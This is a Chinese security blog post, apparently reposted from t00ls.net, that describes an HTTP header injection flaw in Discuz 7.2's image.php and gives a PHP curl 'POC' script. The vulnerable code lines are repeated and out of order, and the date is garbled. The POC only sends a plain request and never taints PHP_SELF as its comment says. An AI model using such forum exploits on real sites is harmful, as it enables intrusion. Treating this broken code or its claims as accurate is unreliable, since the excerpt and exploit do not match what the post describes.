dz7.2 HTTP 头注入漏洞 20107/7/

  • A+
所属分类:lcx

    dz7.2 HTTP 头注入漏洞 20107/7/,dz7.2 header injection vulnerability 20107/7/。 

image.php:

header  header('location: '.$boardurl.$thumbfile);
$boardurl = htmlspecialchars('http://'.$_SERVER['HTTP_HOST'].preg_replace("//+(api|archiver|wap)?/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$thumbfile = 'forumdata/imagecaches/'.$aid.'_'.$w.'_'.$h.'.jpg';
$aid = intval($_GET['aid']);
$w = intval($w);
list($w, $h) = explode('x', $_GET['size']);
$h = intval($h);
list($w, $h) = explode('x', $_GET['size']);

requires:
if(!$nocache) {
if(file_exists($thumbfile)) {

POC:

#!/usr/bin/php -f 

# image.php curl exploit 
# bincker/2010/7/7/ t00ls.net 
 
 
general settings: 
URL:   
COOKIEJAR:   
Max Exec Time:  (s)  
SSL:  BasicAuth:   
$_SERVER parameter:  
You can taint $_SERVER['PHP_SELF'] by editing the target URL.  
   
 
 
//  
// HTTP SERVER,   
//  
 
$target = $argv[1]; 
 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); 
curl_setopt($ch, CURLOPT_URL, "http://$target/image.php"); 
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); 
curl_setopt($ch, CURLOPT_TIMEOUT, 3); 
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); 
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); 
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); 
$buf = curl_exec ($ch); 
curl_close($ch); 
unset($ch); 
 
echo $buf; 
 
?> 

文章来源于lcx.cc:dz7.2 HTTP 头注入漏洞 20107/7/

相关推荐: 雪晖在线投票系统 php 版上传漏洞

    雪晖在线投票系统 php 版上传漏洞,任意文件名解析漏洞。     上传文件 imgupload.php 文件代码: imgupload.php:

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: